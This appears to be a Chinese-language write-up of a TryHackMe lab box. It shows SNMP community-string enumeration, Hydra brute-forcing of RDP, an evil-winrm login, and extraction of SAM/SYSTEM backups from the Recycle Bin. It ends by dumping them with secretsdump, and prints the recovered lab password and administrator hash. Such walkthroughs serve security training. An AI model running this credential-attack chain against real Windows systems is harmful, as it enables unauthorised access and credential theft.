THM打靶日寄39-Year of the Owl

• 扫描打点

  

  

  

  • 80

    只有一个图，扫不到其他的

  • 139 / 445

    

    呃，爆破不到，匿名也没有

    呃，3306 的 mysql 和 3389 的远程桌面都连不上啊嗯

    5985 的 win-rm 就更不用说了

    *偷看wp

    要扫 UDP 。。。

    这里需要注意只扫前 $10$ 端口，不然的话会好慢扫不出来：

    nmap -sUV 10.10.141.39 --top-ports 10 -Pn

    

• 161/UDP:snmp 枚举

  snmp 是一个基于 UDP 的对网络设备管理的服务

  使用 onesixtyone 进行枚举，这个工具也没自带，这个字典在 attackbox 里面并没有自带，在这里可以找到

  onesixtyone 10.10.141.39 -c common-snmp-community-strings-onesixtyone.txt

  ![](https://pic.imgdb.cn/item/6752e140d0e0a243d4def4d6

  发现一个叫 openview 的社区名：

  • 社区名：

    SNMP 中的访问控制机制，类似于访问密码。它分为两种常见类型：

    • Public ：用于只读访问，获取设备的基本信息
    • Private ：用于读写访问，可修改设备配置

    使用 snmp-check 工具枚举该社区名：

    snmp-check 10.10.88.208 -c openview

    

    发现一个用户名 Jareth

    这时候考虑前面找到的 rdp 和 win-rm ，爆一下

    hydra -l jareth -P /usr/share/wordlists/rockyou.txt 10.10.141.39 -t 4 rdp

    再用 evil-winrm 来连

    evil-winrm -i 10.10.88.208 -u jareth -p sarah

• 回收站找system备份提权

  试图传 winpeas 的时候被拦下来了，应该是防火墙或者杀软？

  看 wp 在回收站发现了 SAM 和 SYSTEM 的备份

  但是 C:\$Recycle.Bin 提示不存在，要根据当前用户的 SID 进入回收站：

  whoami /user
  cd 'C:\$Recycle.Bin\S-1-5-21-1987495829-1628902820-919763334-1001'

  再移出来再下载：

  再用 secretdump 拿一下 admin 信息

  python3 secretsdump.py -sam '/home/mikannse/桌面/sam.bak' -system '/home/mikannse/桌面/system.bak' LOCAL

  拿到哈希 administrators:6bc99ede9edcfecf9662fb0c0ddcfa7a